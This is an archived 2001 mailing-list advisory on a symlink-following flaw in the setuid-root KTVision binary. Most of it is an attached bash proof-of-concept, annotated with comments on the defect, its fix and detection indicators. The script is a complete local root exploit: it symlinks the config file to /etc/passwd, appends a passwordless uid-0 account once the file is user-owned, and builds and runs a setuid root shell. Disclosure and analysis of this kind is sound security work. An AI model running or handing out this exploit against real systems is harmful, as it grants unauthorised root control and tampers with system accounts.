Symlinks symlinks...this time KTVision

From: Paul Starzetz (paulat_private)
Date: Fri Jun 22 2001 - 09:37:45 PDT


    Hi ppl,
    
    the subject already states the problem: there is a symlink-following
    vulnerability in the ktvision binary (installed suid root in many
    distributions), versions <= 0.1.1-271.
    
    It is discouraging that nowadays such trivial symlink attacks are still
    possible. No comment anymore. For completeness, a bash script
    demonstrating this vulnerability is attached below.
    
    Ihq.
    
    
    
    
    ------------------------- ktv.sh -------------------------------
    
    #!/bin/bash
    # Proof-of-concept attached to the original report (KTVision <= 0.1.1-271).
    # The defect being demonstrated: a setuid-root binary acts on a file under
    # a user-controlled directory ($link/ktvisionrc) while still privileged and
    # follows a symlink placed there, so the ownership change lands on whatever
    # the link points at ($linkto). The ownership wait loop below is what shows
    # this: it blocks until $linkto is owned by the invoking user.
    # Fix on the binary side: drop to the real uid/gid before creating, chowning
    # or writing per-user config (or refuse symlinks via lstat/O_NOFOLLOW), and
    # preferably do not install the program setuid at all. fs.protected_symlinks
    # does not help here, since the link lives in the user's own directory, not
    # in a world-writable sticky directory.
    # Host-side indicators: $linkto changing owner to a non-root uid, an extra
    # uid-0 line appended to it, and a newly built setuid binary in a home dir.
    
    # Paths are hard-coded for the reporter's environment.
    link=/home/paul/.kde/share/config
    linkto=/etc/passwd
    target=/opt/kde/bin/ktvision
    
    echo ""
    echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
    echo ""
    
    # -u: only proceed if the binary actually carries the setuid bit; the
    # whole issue disappears when it is installed without it.
    if ! test -u $target ; then
    	echo "[-] $target not found"
    	exit 1
    fi;
    
    echo "[+] $target found"
    
    # Helper C source: makes the effective ids real and execs a shell. Note the
    # heredoc is appended (>>) after the rm -f; no comments may go inside it.
    rm -f sush*
    cat <<__DUPA__>>sush.c
    #include <stdio.h>
    main()
    {
    	setuid(geteuid());
    	setgid(getegid());
    	execl("/bin/bash", "/bin/bash", NULL);
    }
    __DUPA__
    
    echo "    compiling sush"
    # NOTE(review): $(...) captures only stdout; gcc reports errors on stderr,
    # so $res stays empty on failure and the '-x sush' test below is the check
    # that really detects a failed compile.
    res=$(gcc sush.c -o sush)
    
    if test "$res" != "" -o ! -x sush ; then
    	echo "[-] failed"
    	rm sush* ktvback.*
    	exit 2;
    fi;
    
    echo "[+] success"
    
    # Keep a copy of $linkto (named by PID) so it can be restored afterwards,
    # then replace the binary's config path with a symlink to it.
    cp $linkto ktvback.$$
    mkdir -p $link
    rm -f $link/ktvisionrc
    ln -s $linkto $link/ktvisionrc
    
    echo ""
    echo -n "now running... (ensure that X is up and running)"
    
    # Start the setuid binary in the background; it needs an X display.
    $target >/dev/null 2>&1 &
    cpid=$!
    
    declare -i cnt
    declare -i max
    cnt=0
    max=60
    
    # Poll (up to $max seconds) until $linkto is owned by the current user
    # (-O). Ownership flipping on the link target is the observable symptom of
    # the symlink being followed while the binary is still root.
    while ! test -O $linkto ; do
    	sleep 1;
    	printf "  %.2d" $cnt
    	cnt=$(($cnt+1))
    	if test $cnt -ge $max ; then
    		echo ""
    		echo ""
    		echo "[-] FAILED"
    		rm sush* ktvback.*
    		exit 2;
    	fi;
    done;
    
    # Stop the binary and remove the symlink once the ownership change is seen.
    kill -9 $cpid >/dev/null 2>&1
    rm $link/ktvisionrc
    
    echo ""
    echo ""
    echo "[+] SUCCESS, creating sush"
    # $linkto is now user-owned, so a uid-0 account with an empty password
    # field can simply be appended. This line is the durable artefact an
    # integrity check on the file would catch.
    echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
    echo ""
    # Via the new account: mark the helper setuid/setgid root, then put the
    # saved copy of $linkto back and return it to root ownership. The command
    # string is split across two lines as received in the mail.
    su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
    ktvback.$$ $linkto; chown 0.0 $linkto"
    rm ktvback.* sush.c
    
    # Sanity check that the setuid bit really ended up on the helper.
    if ! test -u sush ; then
            echo "    hm strange error"
    	rm sush* ktvback.*
            exit 1
    fi;
    
    echo ""
    echo "starting ./sush"
    ./sush
    
    #!plonk
    


